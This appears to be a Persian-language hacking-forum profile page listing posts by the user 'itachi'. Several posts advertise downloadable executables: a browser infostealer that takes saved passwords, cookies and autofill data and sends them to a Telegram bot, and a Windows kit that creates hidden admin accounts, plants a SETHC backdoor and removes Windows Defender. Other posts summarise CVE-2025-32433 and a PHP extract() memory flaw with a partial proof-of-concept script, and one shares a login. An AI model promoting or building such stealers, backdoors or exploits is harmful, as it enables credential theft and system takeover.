Jump to content

itachi

Normal User
  • Posts

    12
  • Joined

  • Last visited

  • Days Won

    2

itachi last won the day on April 24

itachi had the most liked content!

4 Followers

Recent Profile Visitors

89 profile views

itachi's Achievements

Apprentice

Apprentice (3/14)

  • Collaborator Rare
  • Reacting Well Rare
  • First Post
  • Conversation Starter
  • One Month Later

Recent Badges

6

Reputation

  1. Browser_Bkup_vip.exe [Browser BkUp - نسخه VIP] ابزاری قدرتمند برای سرقت اطلاعات و استخراج کامل اطلاعات مرورگرها، طراحی‌شده توسط Itachi. این ابزار مناسب افرادی‌ست که نیاز به دیتایه کامل مرور گر ها دارن (در شرایط خاص) کامل از اطلاعات مرورگرهای مختلف دارند یا در حوزه تحلیل امنیتی فعالیت می‌کنند. ویژگی‌های کلیدی: استخراج کامل رمزهای ذخیره‌شده (Passwords) دریافت کوکی‌های فعال و نشست‌ها (Cookies) تاریخچه کامل مرور (History) اطلاعات فرم‌های پر شده (Autofill) لیست دانلودها (Downloads) بوکمارک‌ها با ساختار کامل JSON ذخیره‌سازی مستقیم اطلاعات به فرمت خوانا (TXT/JSON/DB) ارسال مستقیم فایل‌ها به ربات تلگرام رابط کاربری گرافیکی سایبری (سبز-مشکی) بدون نیاز به دسترسی Administrator برای عملکرد عادی مرورگرهای پشتیبانی‌شده: Google Chrome Microsoft Edge Brave Browser Opera خروجی‌ها به‌صورت مرتب در دسکتاپ ذخیره می‌شوند و به‌صورت رمزگذاری‌شده از طریق تلگرام نیز قابل دریافت هستند. مناسب برای: سرقت اطلاعات از مرورگرها بازیابی اطلاعات از پروفایل آسیب‌دیده تحلیل امنیتی در شبکه یا سیستم‌های هدف ارتباط و دریافت نسخه جدید: https://forum.zerodey.ir/ https://t.me/zirzamincybery0 https://t.me/ir_itachi_ir
  2. [Itachi Browser BkUp - نسخه VIP] ابزاری قدرتمند برای سرقت اطلاعات و استخراج کامل اطلاعات مرورگرها، طراحی‌شده توسط Itachi. این ابزار مناسب افرادی‌ست که نیاز به دیتایه کامل مرور گر ها دارن (در شرایط خاص) کامل از اطلاعات مرورگرهای مختلف دارند یا در حوزه تحلیل امنیتی فعالیت می‌کنند. ویژگی‌های کلیدی: استخراج کامل رمزهای ذخیره‌شده (Passwords) دریافت کوکی‌های فعال و نشست‌ها (Cookies) تاریخچه کامل مرور (History) اطلاعات فرم‌های پر شده (Autofill) لیست دانلودها (Downloads) بوکمارک‌ها با ساختار کامل JSON ذخیره‌سازی مستقیم اطلاعات به فرمت خوانا (TXT/JSON/DB) ارسال مستقیم فایل‌ها به ربات تلگرام رابط کاربری گرافیکی سایبری (سبز-مشکی) بدون نیاز به دسترسی Administrator برای عملکرد عادی مرورگرهای پشتیبانی‌شده: Google Chrome Microsoft Edge Brave Browser Opera خروجی‌ها به‌صورت مرتب در دسکتاپ ذخیره می‌شوند و به‌صورت رمزگذاری‌شده از طریق تلگرام نیز قابل دریافت هستند. مناسب برای: سرقت اطلاعات از مرورگرها بازیابی اطلاعات از پروفایل آسیب‌دیده تحلیل امنیتی در شبکه یا سیستم‌های هدف ارتباط و دریافت نسخه جدید: https://forum.zerodey.ir/ https://t.me/zirzamincybery0 https://t.me/ir_itachi_ir
  3. 🚀 Itachi Browser Backup Tool | نسخه1 برای سرقت اطلاعات مرورگر ها! 🧠🔐 💻 یه ابزار تمام‌عیار، شیک و سایبری که سرقت تمام اطلاعات حیاتی مرورگرهای می‌ده: ✅ رمزهای ذخیره‌شده در Chrome، Edge، Brave، firefox ✅ کوکی‌های فعال و قابل‌استفاده از همه مرورگرها ✅ بدون نیاز به دانش فنی! ✅ با محیط گرافیکی سبز-مشکی مخصوص عاشقای هک و امنیت! 😈💻 🛡️ با Itachi، سرقت اطلاعات مرورگر ها 📍 مخصوص افرادی که به امنیت شخصی و آرشیو اطلاعات اهمیت می‌دن. 📦 نصب نداره، فقط اجرا کن و با خیال راحت بکاپ بگیر... یه بار امتحانش کن، همیشه ازش استفاده می‌کنی! Browser_Bkup.exe
  4. آسیب پذیری بحرانی RCE در ماژول SSH در Erlang/OTP آسیب پذیری با شناسه ی CVE-2025-32433 و شدت بحرانی و امتیاز 10 در ماژول SSH در Erlang/OTP کشف و اصلاح شده که امکان اجرای کد رو به مهاجم احراز هویت نشده، میده. نسخه های OTP-27.3.3 و OTP-26.2.5.11 و OTP-25.3.2.20 نسخه های اصلاح شده هستن و نسخه های قبل از اینا، تحت تاثیر این آسیب پذیری هستن. زبان Erlang یک زبان برنامه‌نویسی هستش که برای ساخت سیستمهای مقیاس‌پذیر، مقاوم و با عملکرد بالا طراحی شده. بیشتر در سیستمهای مخابراتی، پیامرسان، تجهیزات شبکه، اینترنت اشیاء، تجهیزات ICS و OT و ابری استفاده میشه. فریمورک OTP مجموعه‌ای از کتابخانه‌ های استاندارد هستش که همراه Erlang ارائه میشه و ابزارهایی برای مدیریت فرآیندها، ارتباطات شبکه و ... رو فراهم میکنه. در حالت عادی، سرورهای SSH با نرم‌افزارهایی مثل OpenSSH پیاده‌سازی میشن. اما برخی سیستمها از کتابخانه‌ ی Erlang/OTP برای پیاده‌سازی سرور SSH خودشون استفاده میکنن. آسیب‌پذیری CVE-2025-32433 در پیاده‌سازی پروتکل SSH که در خود کتابخانه‌ی Erlang/OTP ارائه شده وجود داره یعنی Erlang/OTP یک ماژول داخلی به نام :ssh داره که برای پیاده‌سازی سرورها و کلاینتهای SSH استفاده میشه. این ماژول بخشی از فریمورک OTP هستش و به توسعه‌دهندگان اجازه میده سرور یا کلاینت SSH بسازن. اگه محصول یا توسعه دهنده ای از این ماژول استفاده کنه، تحت تاثیر این آسیب پذیری قرار داره. اگه سرویس SSH با امتیاز root اجرا بشه، مهاجم دسترسی root داره. داده های خام در شودان، نشون میده که 685,966 سرور در حال اجرای Erlang/OTP هستن که سهم ایران 881 مورد هستش. نکته جالب اینکه گویا اکسپلویت این آسیب پذیری هم ساده هستش و افرادی تونستن با AI
  5. Hold your phone near your card... and they drain your bank account. A new Android malware-as-a-service, SuperCard X, is targeting Italians with NFC relay attacks—letting cybercriminals remotely steal card data and pull off ATM & PoS fraud. 👉 Learn how it works: https://thehackernews.com/2025/04/supercard-x-android-malware-enables.html Google’s now working on a new Android update to block risky app installs. But until then—stay sharp. Think before tapping.
  6. 🔴 آسیب پذیری در تابع extract در PHP: ( https://ssd-disclosure.com/ssd-advisory-extract-double-free5-x-use-after-free7-x-8-x/ ) در نسخه‌ های PHP 5.x تابع extract میتونه منجر به double free بشه. این نوع ب‌اگ زمانی رخ میده که یک بلوک حافظه دو بار آزاد بشه که میتونه باعث خ‌رابی برنامه یا اجرای کد مخ‌رب بشه. در نسخه‌های PHP 7.x ,8.x این تابع میتونه منجر به یک خ‌طای use after free بشه. در این حالت، برنامه به حافظه‌ای که قبلاً آزاد شده دسترسی پیدا میکنه، که میتونه به اجرای کد دلخواه من‌جر بشه. این آس.یب‌پذیریها به مهاجم امکان میده که کد مخ‌رب رو (native code) اجرا کنن. شرکت Zend (توسعه‌دهنده PHP) این مشکل رو برطرف کرده و جزئیاتش رو در یک مشاوره ام‌نیتی در GitHub منتشر کرده. (فعلا بالا نمیاد) ( https://github.com/php/php-src/security/advisories/GHSA-4pwq-3fv3-gm94 ) تابع extract در PHP برای است‌خراج عناصر یک آرایه بصورت متغیرهای جداگانه استفاده میشه. این تابع کلیدهای آرایه رو بعنوان نام متغیرها و مقادیر آرایه رو بعنوان مقدار اون متغیرها تعریف میکنه. ( https://www.php.net/manual/en/function.extract.php ) <?php $array = [ 'name' => 'Ali', 'age' => 25, 'city' => 'Tabriz' ]; extract($array); echo $name; // Output: Ali echo $age; // Output: 25 echo $city; // Output: Tabriz ?> از این تابع برای استخراج داده ها از آرایه های بازگشتی، قالبها، کار با داده های json یا فرمهای داینامیک که کلیدهای آرایه از قبل مشخص نیست استفاده میشه. نمونه PoC: <?php // // Trigger Segfault // class GetFree { public function __destruct() { unset($GLOBALS["b"]); } } $b = new GetFree(); $array = ["b" => "AB"]; extract($array, EXTR_REFS); // avoid string interning using str_shuffle $var1 = str_shuffle("AAAAAAAAAAAAAAAAAAAAAAAA"); $var2 = 888; $var3 = 999; $var4 = 111; $var5 = [$empty]; sleep(1);
  7. عالی موفق باشی🫡
  8. Username: itachi Password: itachi
  9. ⚡ itachi Cyber Tool - نسخه 1.1 منتشر شد! با یک رابط کاربری ساده اما قدرتمند کنترل کامل روی سیستم ویندوز رو در اختیارت بذاره مخصوص پنتسترها ادمین‌ها و کاربران حرفه‌ای. ویژگی‌ها: ° ساخت یوزر مخفی با دسترسی ادمین ° بک‌دور SETHC برای دسترسی سریع ° حذف کامل Windows Defender ° فشرده‌سازی فایل‌ها و بک‌آپ‌گیری کامل ° غیرفعال‌سازی/فعال‌سازی Task Manager و Server Manager ° دانلود خودکار نرم‌افزارهای ضروری (Chrome, WinRAR) ° دانلود با لینک مستقیم ° تغییر پسورد یوزرها + لیست کاربران سیستم دسترسی فقط با رمز عبور محافظت‌شده! امنیت بالا اجرای سریع بدون نیاز به نصب آماده برای عملیات کرک یا مدیریت کامل سیستم. سازنده: @ir_itachi_ir کانال رسمی: https://t.me/+4sE_4E1bUP45MDBk نسخه 1.1 داخل چنل موجود میشود استفاده فقط در مسیر قانونی! #ItachiTools #CyberTool #AdminKit itachi.exe
×
×
  • Create New...